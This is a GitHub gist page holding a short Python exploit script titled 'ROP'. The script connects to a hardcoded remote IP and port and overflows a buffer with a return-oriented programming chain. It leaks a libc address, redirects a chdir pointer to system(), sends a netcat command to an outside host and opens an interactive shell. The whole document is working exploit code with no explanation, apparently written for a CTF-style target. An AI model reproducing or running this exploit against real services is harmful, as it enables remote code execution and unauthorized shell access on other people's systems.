Skip to content

Instantly share code, notes, and snippets.

@vuryleo

vuryleo/main.py

Created December 16, 2014 17:31
Show Gist options
  • Save vuryleo/79a401c224ae3e3ec2ea to your computer and use it in GitHub Desktop.
Save vuryleo/79a401c224ae3e3ec2ea to your computer and use it in GitHub Desktop.
Download ZIP
ROP
Raw
main.py
import time
import struct
from zio import *
io = zio(('166.111.132.132', 1234))
#io = zio(('localhost', 1234))
timeout = 1000 * 1000
buf = 0x0804a10c
recv_addr = 0x080489e6
sendlen_addr = 0x08048a61
chdir_plt_addr = 0x08048680
chdir_ptr = 0x804a218
ppppr_addr = 0x8048e68
pppr_addr = ppppr_addr + 0x1
ppr_addr = ppppr_addr + 0x2
pr_addr = ppppr_addr + 0x3
chdir_libc_addr = 0x000ddf30
system_libc_addr = 0x0003ea70
system_chdir_diff = system_libc_addr - chdir_libc_addr
payload = 'a' * 268 + \
''.join(map(
lambda x: struct.pack('i', x)
, [
recv_addr,
pr_addr,
buf,
sendlen_addr,
ppr_addr,
chdir_ptr,
4,
recv_addr,
pr_addr,
chdir_ptr,
chdir_plt_addr,
0xfffffff,
buf
]))
a = io.readline()
print a
io.writeline(payload)
io.read(293, timeout=timeout)
io.writeline('echo xxx | nc 183.173.136.104 8080')
addr = io.read(4, timeout=timeout)
print
addr = struct.unpack('i', addr)[0]
print hex(addr)
system_addr = addr + system_chdir_diff
print hex(system_addr)
payload = struct.pack('i', system_addr)
io.writeline(payload)
io.read(timeout=timeout)
io.interact()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment